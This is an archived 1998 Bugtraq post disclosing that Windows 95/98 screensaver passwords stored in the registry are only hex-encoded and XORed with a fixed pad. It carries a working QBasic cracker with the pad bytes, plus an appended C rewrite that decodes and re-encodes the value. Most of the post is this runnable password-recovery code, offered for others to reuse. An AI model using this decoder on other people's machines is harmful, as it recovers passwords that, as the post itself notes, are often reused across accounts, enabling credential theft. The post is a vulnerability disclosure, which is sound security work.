[6841] in bugtraq
Windows95/98(?) Screensavers
daemon@ATHENA.MIT.EDU (CrazyLinux)
Thu May 28 13:30:44 1998
Date: Tue, 26 May 1998 23:31:47 +0200
Reply-To: CrazyLinux <kmspill_km@INAME.COM>
From: CrazyLinux <kmspill_km@INAME.COM>
To: BUGTRAQ@NETSPACE.ORG
I got the idea to explore a bit on the w95ss password in the registry
after seeing the bruteforce cracker (using tables of bytes).
(why this is important to bugtraq? loads of people use 1 password for
everything)
It's kinda simple. First hex-decode the bytes (like in WSFTP) then XOR
them with a pad. A basic prog follows (I was too lazy to get C off the
CD).
-cp
Feel free to recode it in C and post to the list.
Content-Disposition: inline; filename="95sscrk.bas"
DECLARE FUNCTION DecryptByte! (bytes!, ya!)
DECLARE FUNCTION HexVal! (coder$)
DIM SHARED byte(16) AS INTEGER
CLS
PRINT "Crazydog's w95 screensaver cracker, basic version"
INPUT "Input char part of ScreenSave_Data(from registry):", code$
' Each stored byte is two hex characters, so the length must be even.
z = LEN(code$): IF z MOD 2 <> 0 THEN PRINT "Must be even # of chars!": END
ON ERROR GOTO 40
FOR y = 1 TO z STEP 2
  balon = balon + 1 ' 1-based number of the byte being decoded
  nibbleone$ = MID$(code$, y, 1): nibbletwo$ = MID$(code$, y + 1, 1)
  mega = (HexVal(nibbleone$) * 16) + HexVal(nibbletwo$)
  IF HexVal(nibbletwo$) < 0 THEN mega = -255 ' one if only.
  IF mega < 0 THEN PRINT "That didn't make any sense.": END
  ' Index by byte number, not string position: byte(y) would run past
  ' byte(16) from the ninth byte on and trip the error handler.
  byte(balon) = DecryptByte(mega, balon)
  wilma$ = wilma$ + CHR$(byte(balon))
NEXT y
PRINT "The code is: "; wilma$; " (case insensitive)"
END
40 PRINT "[unknown]": END
FUNCTION DecryptByte (bytes, ya)
  ' Fixed 16-byte XOR pad; ya is the 1-based position of the byte.
  DIM xorpattern(31) AS INTEGER
  xorpattern(1) = &H48: xorpattern(2) = &HEE: xorpattern(3) = &H76
  xorpattern(4) = &H1D: xorpattern(5) = &H67: xorpattern(6) = &H69
  xorpattern(7) = &HA1: xorpattern(8) = &H1B: xorpattern(9) = &H7A
  xorpattern(10) = &H8C: xorpattern(11) = &H47: xorpattern(12) = &HF8
  xorpattern(13) = &H54: xorpattern(14) = &H95: xorpattern(15) = &H97
  xorpattern(16) = &H5F
  DecryptByte = bytes XOR xorpattern(ya)
END FUNCTION
FUNCTION HexVal (coder$)
coder$ = UCASE$(coder$)
SELECT CASE coder$
CASE "0"
whee = 0
CASE "1"
whee = 1
CASE "2"
whee = 2
CASE "3"
whee = 3
CASE "4"
whee = 4
CASE "5"
whee = 5
CASE "6"
whee = 6
CASE "7"
whee = 7
CASE "8"
whee = 8
CASE "9"
whee = 9
CASE "A"
whee = 10
CASE "B"
whee = 11
CASE "C"
whee = 12
CASE "D"
whee = 13
CASE "E"
whee = 14
CASE "F"
whee = 15
CASE ELSE
whee = -21
END SELECT
HexVal = whee
END FUNCTION
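
Taking up the post's invitation to recode in C, the following is an added example and not part of the original message or its attachment: the same hex-decode-and-XOR step with input validation, plus the inverse, which shows that the stored value is a reversible encoding under a constant pad. The function names and the sample value TEST are assumptions; the pad bytes are the ones in the BASIC listing.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Pad bytes copied from the BASIC listing in the post. */
static const unsigned char PAD[16] = {
    0x48, 0xEE, 0x76, 0x1D, 0x67, 0x69, 0xA1, 0x1B,
    0x7A, 0x8C, 0x47, 0xF8, 0x54, 0x95, 0x97, 0x5F
};

static int hexval(int c)
{
    if (isdigit(c)) return c - '0';
    c = toupper(c);
    return (c >= 'A' && c <= 'F') ? c - 'A' + 10 : -1;
}

/* Returns the decoded length, or -1 on odd length, a non-hex character,
 * or more bytes than the pad or the output buffer can hold. */
int ss_decode(const char *hex, char *out, size_t outsz)
{
    size_t n = strlen(hex);
    if (n % 2 != 0 || n / 2 > sizeof PAD || n / 2 + 1 > outsz) return -1;
    for (size_t i = 0; i < n / 2; i++) {
        int hi = hexval((unsigned char)hex[2 * i]);
        int lo = hexval((unsigned char)hex[2 * i + 1]);
        if (hi < 0 || lo < 0) return -1;
        out[i] = (char)(((hi << 4) | lo) ^ PAD[i]);
    }
    out[n / 2] = '\0';
    return (int)(n / 2);
}

/* XOR is its own inverse, so encoding is the same pad applied again. */
int ss_encode(const char *text, char *hex, size_t hexsz)
{
    size_t n = strlen(text);
    if (n > sizeof PAD || 2 * n + 1 > hexsz) return -1;
    hex[0] = '\0';
    for (size_t i = 0; i < n; i++)
        snprintf(hex + 2 * i, 3, "%02X", (unsigned)((unsigned char)text[i] ^ PAD[i]));
    return (int)n;
}

int main(void)
{
    char hex[33], text[17];
    /* "TEST" is a constructed sample value, not taken from the post. */
    if (ss_encode("TEST", hex, sizeof hex) > 0 && ss_decode(hex, text, sizeof text) > 0)
        printf("%s -> %s\n", hex, text);
    return 0;
}
```

Because the output is two hex characters per input character, the stored value also reveals the password length.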